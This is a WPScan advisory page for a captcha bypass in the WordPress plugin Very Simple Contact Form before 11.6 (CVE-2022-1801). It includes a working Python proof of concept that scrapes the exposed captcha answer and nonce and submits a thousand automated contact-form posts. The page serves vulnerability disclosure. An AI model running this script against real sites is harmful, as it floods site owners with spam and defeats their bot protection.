WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact
WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Very Simple Contact Form < 11.6 - Captcha bypass

Description

The plugin exposes the solution to the captcha in the rendered contact form, both as hidden input fields and as plain text in the page, making it very easy for bots to bypass the captcha check, rendering the page a likely target for spam bots.

Proof of Concept

import requests
from requests_html import HTMLSession
from bs4 import BeautifulSoup
#usage: python3 captcher.py

#this is the url of a WP page that has implemented the form of the plugin.
url = "http://192.168.1.5/index.php/just-some-test-dude/"
proxies = {"http": "127.0.0.1:8080", "https": "127.0.0.1:8080"}

#This functions extracts the value of the captcha challenge by providing the id
def extract_value(response, id):
	soup = BeautifulSoup(response, 'html.parser')
	tag = soup.find('input', attrs={'id': id})
	extracted = tag.get('value')
	return extracted

for i in range(1, 1001):
	s = requests.Session()
	first = s.get(url, proxies=proxies)
	captcha = extract_value(first.text, 'vscf_captcha_hidden_one')
	nonce = extract_value(first.text, 'vscf_nonce')
	data_post = {'vscf_name':'AAA',
            'vscf_email':"[email protected]",
            'vscf_subject': 'aaaaa',
            'vscf_captcha': captcha,
            'vscf_captcha_hidden_one': captcha,
            'vscf_captcha_hidden_two':'0',
            'vscf_firstname': '',
            'vscf_lastname':'',
            'vscf_message': 'ssssssssssssssssssssssssssssssssssssssssssss',
            'vscf_nonce': nonce, #80abc23916
            '_wp_http_referer':'%2Findex.php%2Fjust-some-test-dude%2F',
            'vscf_send': ''}
	submit = s.post(url, data=data_post, proxies=proxies) 

Affects Plugins

very-simple-contact-form
Fixed in version 11.6

References

CVE
CVE-2022-1801

Classification

Type

BYPASS

Miscellaneous

Original Researcher

Sebastian Cruz Cardona

Submitter

Sebastian C. Cardona

Verified

Yes

WPVDB ID
a5c97809-2ffc-4efb-8c80-1b734361cd06

Timeline

Publicly Published

2022-05-30 (about 11 months ago)

Added

2022-05-30 (about 11 months ago)

Last Updated

2023-02-26 (about 2 months ago)

Our Other Services

WPScan WordPress Security Plugin
WPScan

Vulnerabilities

WordPressPluginsThemesOur StatsSubmit vulnerabilities

About

How it worksPricingWordPress pluginNewsContact

For Developers

StatusAPI detailsCLI scanner

Other

PrivacyTerms of serviceSubmission termsDisclosure policyPrivacy Notice for California Users
jetpackIn partnership with Jetpack
githubtwitterfacebook
Angithubendeavor
Work With Us